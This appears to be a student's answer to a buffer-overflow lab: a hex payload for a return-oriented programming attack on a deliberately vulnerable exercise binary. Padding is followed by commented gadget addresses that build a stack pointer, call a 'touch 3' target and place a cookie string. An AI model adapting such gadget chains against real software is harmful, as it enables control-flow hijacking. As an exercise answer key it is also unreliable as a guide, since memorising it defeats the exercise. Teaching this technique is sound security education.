35 39 62 39 39 37 66 61 /* garbage -0x28 */
61 61 61 61 61 61 61 61 /* garbage -0x20 */
30 62 f8 ff ff 7f 61 61 /* garbage -0x18 */
40 b6 b8 f7 ff 7f 61 61 /* garbage -0x10 */
61 61 61 61 61 61 61 61 /* garbage -0x08 */
06 1a 40 00 00 00 00 00 /* 1st return addr: movq %rsp,%rax */
c5 19 40 00 00 00 00 00 /* 0x00 addr: movq %rax,%rdi */
ab 19 40 00 00 00 00 00 /* 0x08 addr: popq %rax */
48 00 00 00 00 00 00 00 /* 0x10 constant 0x48 */
dd 19 40 00 00 00 00 00 /* 0x18 addr: mov %eax,%edx */
34 1a 40 00 00 00 00 00 /* 0x20 addr: mov %edx,%ecx */
13 1a 40 00 00 00 00 00 /* 0x28 addr: mov %ecx,%esi */
d6 19 40 00 00 00 00 00 /* 0x30 addr: add_xy */
c5 19 40 00 00 00 00 00 /* 0x38 addr: movq %rax,%rdi */
fa 18 40 00 00 00 00 00 /* 0x40 addr: touch 3 */
35 39 62 39 39 37 66 61 /* 0x48 the string of cookie */
00
